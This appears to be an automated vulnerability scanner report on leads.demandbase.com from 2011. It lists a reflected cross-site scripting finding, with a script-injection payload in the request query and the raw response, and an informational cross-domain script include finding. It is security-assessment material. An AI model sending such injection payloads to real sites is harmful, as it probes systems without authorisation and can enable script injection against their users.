1. Cross-site scripting (reflected)
2. Cross-domain script include
Severity: | High |
Confidence: | Certain |
Host: | https://leads.demandbase |
Path: | / |
GET /?812a6"><script>alert(1)< Host: leads.demandbase.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 200 OK Date: Tue, 30 Aug 2011 14:24:14 GMT Server: Apache X-Powered-By: PHP/5.2.6-1+lenny9 P3P: CP='NOI DSP COR CUR OUR NID NOR' Cache-Control: must-revalidate, no-cache Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 43587 <!doctype html> <html> <head> <title></title> <meta http-equiv="content-type" content="text/html; charset=UTF-8"> <meta name="description" content="" /> <meta name="keywords" content="" /> <link href= ...[SNIP]... <link rel="canonical" href="http://getclicky ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | https://leads.demandbase |
Path: | / |
GET / HTTP/1.1 Host: leads.demandbase.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 200 OK Date: Tue, 30 Aug 2011 14:24:11 GMT Server: Apache X-Powered-By: PHP/5.2.6-1+lenny9 P3P: CP='NOI DSP COR CUR OUR NID NOR' Cache-Control: must-revalidate, no-cache Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 43855 <!doctype html> <html> <head> <title></title> <meta http-equiv="content-type" content="text/html; charset=UTF-8"> <meta name="description" content="" /> <meta name="keywords" content="" /> <link href="http://static <script src="http://static <script type="text/javascript" src="//www.google.com ...[SNIP]... </script> <script src="//static.getclicky ...[SNIP]... |